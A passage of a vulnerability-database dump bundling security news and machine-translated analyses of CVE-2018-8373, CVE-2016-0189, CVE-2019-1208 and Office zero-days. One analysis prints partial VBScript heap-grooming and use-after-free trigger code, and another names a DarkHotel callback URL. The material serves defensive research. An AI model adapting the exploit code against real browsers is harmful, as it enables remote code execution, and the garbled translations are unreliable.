passcode](<https://threatpost.com/iphone-xs-passcode-bypass-hack-exposes-contacts-photos/137790/>) bypass hack exposes contacts and photos. (Source: ThreatPost)\n * Secret Service warns of surge in [ATM](<https://krebsonsecurity.com/2018/09/secret-service-warns-of-surge-in-atm-wiretapping-attacks/>) 'wiretapping' attacks. (Source: Krebs on Security)\n * [Mutagen Astronomy](<https://www.theregister.co.uk/2018/09/27/mutagen_astronomy_linux/>): Linux kernel 'give me root, now' security hole sighted. (Source: TheRegister)\n\nStay safe, everyone!\n\nThe post [A week in security (September 24 \u2013 30)](<https://blog.malwarebytes.com/security-world/2018/10/a-week-in-security-september-24-30/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2018-10-01T16:44:20", "published": "2018-10-01T16:44:20", "id": "MALWAREBYTES:37E5B8085C06BEB2C5CED2D9549F29CB", "href": "https://blog.malwarebytes.com/security-world/2018/10/a-week-in-security-september-24-30/", "type": "malwarebytes", "title": "A week in security (September 24 \u2013 30)", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "thn": [{"lastseen": "2018-08-14T19:13:11", "bulletinFamily": "info", "cvelist": ["CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8344", "CVE-2018-8345", "CVE-2018-8350", "CVE-2018-8373", "CVE-2018-8397", "CVE-2018-8414"], "description": "[](<https://1.bp.blogspot.com/-qwwoxa_7EJU/W3MgMLUnqBI/AAAAAAAAx2w/Vm6kHn_yEXcCGZdP9PzpzEq1AnAL0XqkQCLcBGAs/s728-e100/microsoft-windows-update.png>)\n\nGet your update caps on. \n \nJust a few minutes ago Microsoft released its latest monthly Patch Tuesday update for August 2018, patching a total of 60 vulnerabilities, of which 19 are rated as critical. \n \nThe updates patch flaws in Microsoft Windows, Edge Browser, Internet Explorer, Office, ChakraCore, .NET Framework, Exchange Server, Microsoft SQL Server and Visual Studio. \n \nTwo of these vulnerabilities patched by the tech giant is listed as publicly known and being exploited in the wild at the time of release. \n \nAccording to the [advisory](<https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/ecb26425-583f-e811-a96f-000d3a33c573>) released by Microsoft, all 19 critical-rated vulnerabilities lead to remote code execution (RCE), some of which could eventually allow attackers to take control of the affected system if exploited successfully. \n \nBesides this, Microsoft has also addressed 39 important flaws, one moderate and one low in severity. \n\n\n \nHere below we have listed brief details of a few critical and publically exploited important vulnerabilities: \n \n\n\n### Internet Explorer Memory Corruption Vulnerability (CVE-2018-8373)\n\n \nThe first vulnerability under active attack is a critical remote code execution vulnerability that was revealed by Trend Micro last month and affected all supported versions of Windows. \n \nInternet Explorer 9, 10 and 11 are vulnerable to a memory corruption issue that could allow remote attackers to take control of the vulnerable systems just by convincing users to view a specially crafted website through Internet Explorer. \n \n\n\n> \"An attacker could also embed an ActiveX control marked \u2018safe for initialization\u2019 in an application or Microsoft Office document that hosts the IE rendering engine,\" Microsoft says in its advisory.\n\n \n\n\n### Windows Shell Remote Code Execution Vulnerability (CVE-2018-8414)\n\n \nThe second publicly known and actively exploited flaw resides in the Windows Shell, which originates due to improper validation of file paths. \n \nThe arbitrary code can be executed on the targeted system by convincing victims into opening a specially crafted file received via an email or a web page. \n \n\n\n### Microsoft SQL Server RCE (CVE-2018-8273)\n\n \nMicrosoft SQL Server 2016 and 2017 are vulnerable to a buffer overflow vulnerability that could be exploited remotely by an attacker to execute arbitrary code in the context of the SQL Server Database Engine service account. \n\n\n \nSuccessful exploitation of the vulnerability requires a remote attacker to submit a specially crafted query to an affected SQL server. \n \n\n\n### Windows PDF Remote Code Execution Vulnerability (CVE-2018-8350)\n\n \nWindows 10 systems with Microsoft Edge set as the default browser can be compromised merely by convincing users to view a website. \n \nDue to improper handling of the objects in the memory, Windows 10's PDF library could be exploited by a remote attacker to execute arbitrary code on the targeted system. \n\n\n> \"The attacker could also take advantage of compromised websites or websites that accept or host user-provided content or advertisements, by adding specially crafted PDF content to such sites,\" Microsoft says in its advisory.\n\n> \"Only Windows 10 systems with Microsoft Edge set as the default browser can be compromised simply by viewing a website.\"\n\n \n\n\n### Microsoft Exchange Memory Corruption Vulnerability (CVE-2018-8302)\n\n \nThis vulnerability resides in the way this software handles objects in memory, allowing a remote attacker to run arbitrary code in the context of the System user just by sending a specially crafted email to the vulnerable Exchange server. \n \nThe flaw affects Microsoft Exchange Server 2010, 2013 and 2016. \n \n\n\n### Microsoft Graphics Remote Code Execution Vulnerability (CVE-2018-8344)\n\n \nMicrosoft revealed that Windows font library improperly handles specially crafted embedded fonts, which could allow attackers to take control of the affected system by serving maliciously embedded fonts via a specially crafted website and document file. \n \nThis vulnerability affects Windows 10, 8.1, and 7, and Windows Server 2016 and 2012. \n \n\n\n### LNK Remote Code Execution Vulnerability (CVE-2018-8345)\n\n \nThis vulnerability exists in .LNK shortcut file format used by Microsoft Windows 10, 8.1, 7 and Windows Server editions. \n \nAn attacker can use malicious .LNK file and an associated malicious binary to execute arbitrary code on the targeted system. Successful exploitation of this vulnerability could allow attackers to gain the same user rights on the target Windows system as the local user. \n\n\n \nAccording to the Microsoft advisory, users accounts configured with fewer user rights on the system are less impacted by this vulnerability than users who operate with administrative user rights. \n \n\n\n### GDI+ Remote Code Execution Vulnerability (CVE-2018-8397)\n\n \nThis RCE flaw resides in the way Windows Graphics Device Interface (GDI) handles objects in the memory, allowing an attacker to take control of the affected system if exploited successfully. \n\n\n> \"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\" Microsoft says in its advisory explaining the flaw.\n\n> \"Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\"\n\nThe vulnerability affects Windows 7 and Windows Server 2008. \n \nBesides this, Microsoft has also pushed security updates to [patch vulnerabilities in Adobe products](<https://thehackernews.com/2018/08/adobe-patch-updates.html>), details of which you can get through a separate article posted today. \n \nUsers are strongly advised to apply security patches as soon as possible to keep hackers and cybercriminals away from taking control of their computers. \n \nFor installing security updates, directly head on to Settings \u2192 Update &amp; security \u2192 Windows Update \u2192 Check for updates, or you can install the updates manually. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "modified": "2018-08-14T18:36:07", "published": "2018-08-14T18:32:00", "id": "THN:F033FC8698702175A4736D089C3C9D13", "href": "https://thehackernews.com/2018/08/microsoft-patch-updates.html", "type": "thn", "title": "Microsoft Releases Patches for 60 Flaws\u2014Two Under Active Attack", "cvss": {"score": 0.0, "vector": "NONE"}}], "myhack58": [{"lastseen": "2018-08-18T12:22:20", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2015-6332", "CVE-2018-8373", "CVE-2018-8242"], "description": "Background \n2018 8 on 15 May, the network security company Trend Micro disclosed its in this year 7 month to capture an example in the wild 0day vulnerability to attack, the attack uses the Windows VBScript Engine code execution vulnerability, through the analysis and comparison found that the 0day vulnerability and 2018, the 4 on 360 the company first found to affect the IE browser and through Office documents to attack the\u201cdouble kill\u201dvulnerability, see reference[1] The use of a plurality of the same attack techniques, is likely to be the same gang responsible. \n360 Threat Intelligence Center the first time for the 0day vulnerabilities were analyzed to confirm, and through big data correlation analysis to confirm this 0day in the wild attacks the DarkHotel APT organization of the present Association. \n\nSource \n2018 8 May 15, Trend Micro disclosed its in year 7 of the 11 January capture of an example in the wild 0day exploit technical analysis, the vulnerability had been disclosed the day before by Microsoft to repair the vulnerability number is: CVE-2018-8373\u3002 \n\nThree\u201cdouble kill\u201d0day vulnerabilities timeline \nCVE-2018-8373 is actually this year was found to affect the Windows VBScript Engine of the third vulnerability, of which the first two are for 360 the company security researchers first discovered that the three vulnerabilities affect IE browser, and can be Microsoft Office document attacks. Three\u201cdouble kill\u201d0day vulnerability discovery timeline is as follows: \nCVE \nFind the time \nRepair time \nDescription \nCVE-2018-8174 \n2018.4.18 \n2018.5.8 \nAffects Office and IE to double-kill the vulnerability in the wild \nCVE-2018-8242 \n2018.7.10 \n360 security researchers discovered and reported to Microsoft, reference[2]\uff09 \nCVE-2018-8373 \n2018.7.11 \n2018.8.14 \nAffects Office and IE to double-kill the vulnerability in the wild \n\nTraceability with associated \nGet a code after IOC \n360 Threat Intelligence Center through the analysis of big data associated with the first to get a Trend Micro code after the IOC address: \nhttp://windows-updater.net/realmuto/wood.php?who=1?????? \nAssociation of homologous 0day attack sample \nAnd now a time of attack and the Trend Micro found in the wild\u201cDouble kill\u201d0day attack on the same day the suspect used the 0day attack office documents samples, the Offce document samples embedded in the domain and trends of the technology given domain format consistent http://windows-updater.net/stack/ov.php?w= 1\\x00who =1\uff09 \n! [](/Article/UploadPic/2018-8/2018818164226756. png) \nConfirm with the DarkHotel Association \nGet 0day vulnerability attacks use the domain name after we immediately found that the domain name it is a 360 Threat Intelligence Center in the year 5 month to publish on the DarkHotel APT gang latest attack activity to use the domain name as detailed in reference[4] is: \n! [](/Article/UploadPic/2018-8/2018818164226401. png) \n! [](/Article/UploadPic/2018-8/2018818164227720. png) \n360 Threat Intelligence Center the threat platform enter the domain name will be immediately associated to the DarkHotel: a \n! [](/Article/UploadPic/2018-8/2018818164227684. png) \nCVE-2018-8373 vulnerability analysis \nShown below is the trend given the corresponding POC to trigger the code: \n! [](/Article/UploadPic/2018-8/2018818164227680. png) \nAs for the vulnerability, and this year 5 on the 360 capture CVE-2018-8174 POC comparison, CVE-2018-8174 main vulnerability is the reason that Class_Terminater can be on the release of the memory object to continue the assignment, resulting in the release of after reuse, and the CVE-2018-8373 is a class of Propert the Get operation can modify the corresponding class of members of the array length, so that the result after the object reuse: \n! [](/Article/UploadPic/2018-8/2018818164227915. png) \nThe following is the corresponding POC code POC code is very simple, VulClass class defined in the array member variable, \nMethod Class_Initialize and Public Default Property Get P. \nWhich Class_Initialize is a VB one that has been deprecated methods used in class to create the time to achieve the corresponding operation, the overload can be in the class to create to complete the appropriate initialization work after the is new instead. \nThe Default Property for a class attribute, is the Public Default Property Get P reload, for the class of access will trigger the appropriate action in the POC that the implementation of ReDim Preserve array(1 to). \nReDim is used to specify the memory reallocation, which is the final in the VB engine through the SafeArrayRedim function, familiar with VB vulnerability, then, can know that the function is before CVE-2015-6332 vulnerability of roots: \n! [](/Article/UploadPic/2018-8/2018818164227987. png) \nPOC first execute the line of code, The new time corresponding to perform the following functions VBScriptClass::InitializeClass, since VulClass class overloads the Class_Initialize method, and therefore by vbscript! CScriptEntryPoint::Call distribute the proceeds to the corresponding coders to achieve the Class_Initialize method: \nSet cls = New VulClass \n! [](/Article/UploadPic/2018-8/2018818164227605. png) \nClass_Initialize method to modify the corresponding array length: \nPrivate Sub Class_Initialize \nReDim array(2) \nEnd Sub \nYou can see this is generated when the Array object as shown below, the members of which the number of variables is 3, corresponding to the pvData is 0x0514dfd0: the \n! [](/Article/UploadPic/2018-8/2018818164228601. png) \nAfter running the following code, The VB engine to parse the following code sequence is from left from right scan, so the first would be the cls. array(2)action: \ncls. array(2) = cls \nThis will call the function vbscript! AccessArray to determine whether the corresponding array\uff082\uff09whether the access, as shown below at this time to obtain a corresponding array of memory objects: \n\n\n**[1] [[2]](<91201_2.htm>) [[3]](<91201_3.htm>) [next](<91201_2.htm>)**\n", "edition": 1, "modified": "2018-08-18T00:00:00", "published": "2018-08-18T00:00:00", "id": "MYHACK58:62201891201", "href": "http://www.myhack58.com/Article/html/3/62/2018/91201.htm", "title": "Use CVE-2018-8373 0day vulnerabilities the attacks the Darkhotel gang-related analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-09-17T10:34:17", "bulletinFamily": "info", "cvelist": ["CVE-2018-8373", "CVE-2019-1208"], "description": "The last 6 months, I to Microsoft the report the IE browser in a[UAF](<https://cwe.mitre.org/data/definitions/416.html>)\uff08after the release of the reused vulnerability vulnerability is the official positioning of the severity levels, numbered[CVE-2019-1208](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1208>), Microsoft in 9 months[Patch Tuesday](<https://blog.trendmicro.com/trendlabs-security-intelligence/september-patch-tuesday-bears-more-remote-desktop-vulnerability-fixes-and-two-zero-days/>)fixes this vulnerability. I by[BinDiff](<https://www.zynamics.com/bindiff.html>) a binary code analysis tool that discovered the defect, prepare a PoC to demonstrate how to in Windows 10 RS5 system to exploit the vulnerability.\n\nThis article briefly describes the vulnerability research process, and if you want in-depth analysis of the vulnerability, you can refer to this article[technical briefing](<https://documents.trendmicro.com/assets/Tech-Brief-A-Proof-of-Concept-Exploiting-CVE-2019-1208-in-Internet-Explorer.pdf>a).\n\n0x01 CVE-2019-1208 \nAs mentioned earlier, CVE-2019-1208 is a UAF vulnerability. Such security issues would undermine the validity of the data, causing the process to crash, and the attacker can according to the vulnerability trigger to arbitrary code execution or remote code. Once successfully exploited, CVE-2019-1208 vulnerability, the attacker can get the system with the current user the same permissions. If the current user has administrator privileges, then the attacker can hijack the affected system, such as Install or uninstall programs, view and modify data to create a full permissions user accounts etc. \n\n0x02 potential impact \nIn a relatively straightforward attack scenario, an attacker can through the social engineering way to the unknown user to send phishing messages, inducing users through the IE browser to access that contains the CVE-2019-1208 of the code of the malicious sites can be. In addition, the attacker can also send spam, the Annex contains the vulnerability is the use of the code. These attachments can be enabled for the IE rendering engine, Microsoft Office document, or contains an ActiveX control Application Program Files, and then in the control that contains the exploit code. The attacker can also be compromised and the user interaction data such as advertisement data of a legitimate site, in the above hosting use code. \n! [](/Article/UploadPic/2019-9/2019917134346354. png) \nFigure 1. VbsJoin code execution flow \n\n0x03 discovery process \nThe story is derived from BinDiff, when I want to compare the next Microsoft in 5 month and 6 month of vbscript. the dll function which changes the vbscript. the dll is that contains the VBScript engine related API functions of a module to. I found Microsoft in SafeArrayAddRef, the SafeArrayReleaseData and SafeArrayReleaseDescriptor this a few function to do the changes. \nAfter further research, prior to their discovery of another vulnerability, CVE-2018-8373 of inspiration, I by the following steps, using the VBScriptClass trigger a UAF problem: \n1, a arr = Array(New MyClass): create a SafeArray that will VBScriptclass: MyClass is saved in arr[0]; and \n2, the Callback: arr = Array(0): Join(arr)will trigger MyClass Public Default Property Get callback function. The callback for the variable arr to create a new SafeArray to. As shown in Figure 1, a new SafeArray and not subject to SafeArrayAddRef function of protection. Thus, the browser the normal vision of the Code Stream is the callback function break; and \n3, the arr(0) = Join(arr): when from the Public Default Property Get callback function returns, VbsJoin the code execution flow will call SafeArrayReleaseData and SafeArrayReleaseDescriptor to reduce SafeArrayData and SafeArrayDescriptor the reference count. However, a new SafeArray is not affected by SafeArrayAddRef protection, and SafeArrayData and SafeArrayDescriptor the reference count is 0. Therefore, the new SafeArray of SafeArrayData and SafeArrayDescriptor in SafeArrayReleaseData and SafeArrayReleaseDescriptor function is released, as shown in Figure 2. \n\n\n**[1] [[2]](<96031_2.htm>) [next](<96031_2.htm>)**\n", "edition": 1, "modified": "2019-09-17T00:00:00", "published": "2019-09-17T00:00:00", "id": "MYHACK58:62201996031", "href": "http://www.myhack58.com/Article/html/3/62/2019/96031.htm", "title": "From BinDiff to 0day: Internet Explorer UAF vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-13T15:28:15", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2014-6332", "CVE-2016-0189", "CVE-2018-8373", "CVE-2017-0149"], "description": "Last year at the end of 10, I get a public view is not quite the same as CVE-2016-0189 the use of samples. Preliminary analysis, I think this should be the year CVE-2016-0189 of the original Attack File. Its confused approach and subsequent occurrence of CVE-2017-0149, CVE-2018-8174, CVE-2018-8373 exactly the same. Its use and loading shellcode techniques are also behind several utilizing the same. \nAt the time I at hand with other things, and not to the sample were carefully studied. A few days ago, I re-dug out the relevant samples for a lot of debugging. \nThis article I will describe the CVE-2016-0189 sample use of the way, the reader later will be seen, the use of the process of dislocation techniques and CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373 almost the same. \nBefore the public vision of the CVE-2016-0189 sample, the basic is a reference to this article in the publication of the code, with regard to this disclosure code use of the details, I'm in before articles have detailed analysis. \nBelow we to a glimpse of 3 years ago CVE-2016-0189 actual 0day samples using the technique. \n\nMemory layout \nAs of the present in by means of the following code into the function \ndocument. write(\" var obj = {}; obj. toString = function() { my_valueof(); return 0;}; StartExploit(obj); \" &amp;Unescape(\"%3c/script%3e\")) \nIn StartExploit function, first call the prepare function of the memory layout. Each execution of arr2(i) = Null will lead to a tagSAFEARRAY structure of the body memory is recovered. \nReDim arr(0, 0) \narr(0, 0) = 3 'this is an important step, the digital 3 in the dislocation will be interpreted as a vbLong type \n... \nSub prepare \nDim arr5() \nReDim arr5(2) \nFor i = 0 To 17 \narr3(i) = arr5 \nNext \nFor i = 0 To &amp;h7000 \narr1(i) = arr \nNext \nFor i = 0 To 1999 \narr2(i) = arr 'will arr2 each member is initialized to an array \nNext \nFor i = 1000 To 100 Step -3 \narr2(i)(0, 0) = 0 \narr2(i) = Null 'release arr2(100) ~ arr2(1000) between the 1/3 of the elements \nNext \nReDim arr4(0, &amp;hFFF) 'defined arr4 \nEnd Sub \nFunction StartExploit(js_obj) \n'Omitted unrelated code \nprepare \narr4(js_obj, 6) = &amp;h55555555 \nFor i = 0 To 1999 \nIf IsArray(arr2(i)) = True Then \nIf UBound(arr2(i), 1) &gt; 0 Then \nvul_index = i \nExit For \nEnd If \nEnd If \nNext \nlb_index = LBound(arr2(i), 1) \nIf prepare_rw_mem() = True Then \nElse \nExit Function \nEnd If \naddr = leak_addr() \n'Omitted in the subsequent code \nEnd Function \nEach tagSAFEARRAY in memory occupies a size of 0x30 bytes, wherein after the 0x20 bytes stored tagSAFEARRAY the actual data. \n0:015&gt; ! heap-p-a 052a9fb0 \naddress 052a9fb0 found in \n_HEAP @ 360000 \nHEAP_ENTRY Size Prev Flags UserPtr UserSize - state \n052a9f98 0007 0000 [00] 052a9fa0 00030 - (busy) \n0:015&gt; dd 052a9fa0 l30/4 \n052a9fa0 00000000 00000000 00000000 0000000c \n052a9fb0 08800002 00000010 00000000 0529d640 \n052a9fc0 00000001 00000000 00000001 00000000 \n0:015&gt; dt ole32! tagSAFEARRAY 052a9fb0 \n+0x000 cDims : 2 \n+0x002 fFeatures : 0x880 \n+0x004 cbElements : 0x10 \n+0x008 cLocks : 0 \n+0x00c pvData : 0x0529d640 \n+0x010 rgsabound : [1] tagSAFEARRAYBOUND \nThe entire release process resulting in approximately 300 0x30 size of the memory hole. \n\nTo trigger the vulnerability \nMemory layout is completed, the use of the code by arr4(js_obj, 6) = &amp;h55555555 this operation enters the custom my_valueof callback function, and then in the callback function re-definition of arr4 on. This leads to arr4 corresponding to the original pvData memory is released, and according to the required size to apply the new memory. \nSub my_valueof() \nReDim arr4(2, 0) \nEnd Sub \nThe above statements will result in arr4(2, 0)corresponding to the pvData to apply a size of 0x30 in the memory, with associated memory distribution characteristics, this process will reuse a block just released tagSAFEARRAY memory. \nWe take a closer look at arr4(js_obj, 6) = &amp;h55555555 statement execution logic. \nCVE-2016-0189 causes that AccessArray encountered in javascript objects can lead to a pair of overloaded function callback my_valueof, use the code in my_valueof will arr4 re-defined as arr4(2, 0), when the callback is completed is again returned to the AccessArray, the arr4-related tagSAFEARRAY structure of the body and the pvData pointer have been modified, and the AccessArray will continue to under perform when still in accordance with the arr4(0, 6)in the calculation of element address, and the calculated address is stored to a stack variable. \n\n\n**[1] [[2]](<94507_2.htm>) [[3]](<94507_3.htm>) [[4]](<94507_4.htm>) [next](<94507_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994507", "href": "http://www.myhack58.com/Article/html/3/62/2019/94507.htm", "title": "For a suspected CVE-2016-0189 the original attack sample debugging-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", "CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is for me at Bluehat Shanghai 2019 presentation of an extended summary. In this article, I will summarize the 2010 to 2018 years of Office-related 0day/1day vulnerability. I will be for each type of vulnerability do once carded, and for each vulnerability related to the analysis of the articles referenced and categorized. \nHope this article can help to follow-up engaged in office vulnerability research. \n\nOverview \nFrom 2010 to 2018, the office of the 0day/1day attack has never been suspended before. Some of the following CVE number, is my in the course of the study specifically observed, there have been actual attacks sample 0day/1day vulnerability(perhaps there are some omissions, the reader can Supplement the). \nWe first look at the specific CVE number. \nYear \nNumber \n2010 \nCVE-2010-3333 \n2011 \nCVE-2011-0609/CVE-2011-0611 \n2012 \nCVE-2012-0158/CVE-2012-0779/CVE-2012-1535/CVE-2012-1856 \n2013 \nCVE-2013-0634/CVE-2013-3906 \n2014 \nCVE-2014-1761/CVE-2014-4114/CVE-2014-6352 \n2015 \nCVE-2015-0097/CVE-2015-1641/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645 \n2016 \nCVE-2016-4117/CVE-2016-7193/CVE-2016-7855 \n2017 \nCVE-2017-0199/CVE-2017-0261/CVE-2017-0262/CVE-2017-8570/CVE-2017-8759/CVE-2017-11826/CVE-2017-11882/CVE-2017-11292 \n2018 \nCVE-2018-0798/CVE-2018-0802/CVE-2018-4878/CVE-2018-5002/CVE-2018-8174/CVE-2018-8373/CVE-2018-15982 \nOur first press Assembly of the type above-described vulnerability classification. Note that, the Flash itself also belongs to the ActiveX control-a, the following table of classification I be independently classified as a class. \nComponent type \nNumber \nRTF control word parsing problem \nCVE-2010-3333/CVE-2014-1761/CVE-2016-7193 \nThe Open XML tag parsing problem \nCVE-2015-1641/CVE-2017-11826 \nActiveX control to resolve the problem \nCVE-2012-0158/CVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nOffice embedded Flash vulnerabilities \nCVE-2011-0609/CVE-2011-0611/CVE-2012-0779/CVE-2012-1535/CVE-2013-0634/CVE-2015-5119/CVE-2015-5122/CVE-2015-7645/CVE-2016-4117/CVE-2016-7855/CVE-2017-11292/CVE-2018-4878/CVE-2018-5002/CVE-2018-15982 \nOffice TIFF image parsing vulnerability \nCVE-2013-3906 \nOffice EPS file parsing vulnerability \nCVE-2015-2545/CVE-2017-0261/CVE-2017-0262 \nBy means of the Moniker the loading vulnerability \nCVE-2017-0199/CVE-2017-8570/CVE-2017-8759/CVE-2018-8174/CVE-2018-8373 \nOther Office logic vulnerability \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097 \nWe then based on the vulnerability type of the above-mentioned non-Flash vulnerabilities classification. Flash vulnerabilities related to the summary you can refer to other researcher's articles \nVulnerability type \nNumber \nStack Overflow(Stack Overflow) \nCVE-2010-3333/CVE-2012-0158/CVE-2017-11882/CVE-2018-0798/CVE-2018-0802 \nStack bounds write(Out-of-bound Write) \nCVE-2014-1761/CVE-2016-7193 \nType confusion(Type Confusion) \nCVE-2015-1641/CVE-2017-11826/CVE-2017-0262 \nAfter the release of reuse(Use After Free) \nCVE-2012-1856/CVE-2015-1642/CVE-2015-2424/CVE-2015-2545/CVE-2017-0261/CVE-2018-8174/CVE-2018-8373 \nInteger overflow(Integer Overflow) \nCVE-2013-3906 \nLogic vulnerabilities(Logical vulnerability) \nCVE-2014-4114/CVE-2014-6352/CVE-2015-0097/CVE-2017-0199/CVE-2017-8570/CVE-2017-8759 \nNext We according to the above second table Flash vulnerability, except to one by one look at these vulnerabilities. \n\nRTF control word parsing problem \nCVE-2010-3333 \nThe vulnerability is the Cohen laboratory head of the wushi found. This is a stack overflow vulnerability. \nOn the vulnerability analysis of the article to see snow on a lot, the following are a few articles. \nCVE-2010-3333 vulnerability analysis(in depth analysis) \nMS10-087 from vulnerability to patch to the POC \nThe vulnerability of the war of Chapter 2, Section 4 of this vulnerability also have to compare the system description, the interested reader can read The Associated chapters. \nCVE-2014-1761 \nThe vulnerability is Google found a 0day in. This is a heap memory bounds write vulnerability. \nLi Hai fly was on the vulnerability done a very wonderful analysis. \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nSee snow forum is also related to the vulnerability of the two high-quality analysis articles. \nCVE-2014-1761 analysis notes \nms14-017(cve-2014-1761)learn the notes inside there is mentioned how to configure the correct environment \nThe security agent is also related to the vulnerability of a high-quality analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08the third period\uff09 \nIn addition, South Korea's AhnLab also made a post about this vulnerability report. \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nDebugging this vulnerability requires attention is the vulnerability of some of the samples to trigger the environment is relatively harsh, the article inside mentions how to construct a relevant experimental environment. \nCVE-2016-7193 \nThe vulnerability is the Austrian Military Cyber Emergency Readiness Team Austria military Cyber Emergency Readiness Team reported to Microsoft a 0day is. \nIt is also a heap memory bounds write vulnerability. \nBaidu Security Labs has worked on the vulnerability done a more complete analysis. \nAPT attack weapon-the Word vulnerability, CVE-2016-7193 principles of the secret \nI also worked on the vulnerability of the use of writing to share through an article analysis. \nCombined with a field sample to construct a cve-2016-7193 bomb calculator use \n\nThe Open XML tag parsing problem \nCVE-2015-1641 \nGoogle 0day summary table will be listed for 2015 0day one. \nThis is a type confusion vulnerability. \nAbout the vulnerability, the fly tower has written an article analysis article. \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAli safe is also about the vulnerability wrote a wonderful analysis. \nword type confusion vulnerability CVE-2015-1641 analysis \nThe security agent also has the vulnerability of a wonderful analysis. \nHand to hand teach you how to construct the office exploits EXP\uff08fourth period\uff09 \nKnow Chong Yu the 404 lab also wrote an article on the vulnerability the wonderful analysis. \nCVE-2015-1641 Word using the sample analysis \nI've also written relates to the vulnerability of the principles of an article to share. \nThe Open XML tag parsing class vulnerability analysis ideas \nIn debugging this relates to the heap spray in the office sample, the need to pay special attention to the debugger intervention tends to affect the process heap layout, particularly some of the heap option settings. If when debugging the sample behavior can not be a normal trigger, often directly with the debugger launch the sample result, this time you can try double-click the sample after Hang, the debug controller. \n\n\n**[1] [[2]](<94516_2.htm>) [[3]](<94516_3.htm>) [[4]](<94516_4.htm>) [next](<94516_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8345", "CVE-2018-8373"], "description": "In this month's Patch Tuesday release there are 63 vulnerabilities patched with 20 Criticals. Out of the criticals, over half are browser-related, with the rest including Windows, SQL, and Exchange. Active exploits have been detected against CVE-2018-8373, one of the scripting engine vulnerabilities.\n\n### Workstation Patches\n\nBrowser and Scripting Engine patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. Microsoft has disclosed that [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) has active exploits against Internet Explorer, making these patches a high priority. The PDF viewer, Windows Font Library, and GDI+ also have patches available that require a user to interact with a malicious site or file.\n\n### LNK Remote Code Execution\n\nA vulnerability ([CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>)) exists in the processing of shortcuts. This patch should be prioritized for both workstations and servers, as the user does not need to click the file to exploit. Simply viewing a malicious LNK file can execute code as the logged-in user.\n\n### Microsoft Exchange\n\nA vulnerability ([CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>)) was [discovered](<https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-remote-code-execution-on-microsoft-exchange-server>) in Exchange that can result in code executing as System. Exploitation of this vulnerability requires access to mailbox account setup, and can not be exploited by non-privileged users.\n\n### Microsoft SQL 2016/2017\n\nMicrosoft SQL was also patched for a remote code execution vulnerability ([CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>)). Exploiting this vulnerability does require the ability to execute SQL queries, but this could be accomplished by chaining an existing SQL injection vulnerability in a web application.\n\n### L1 Terminal Fault (Foreshadow)\n\nMicrosoft has released a [guidance 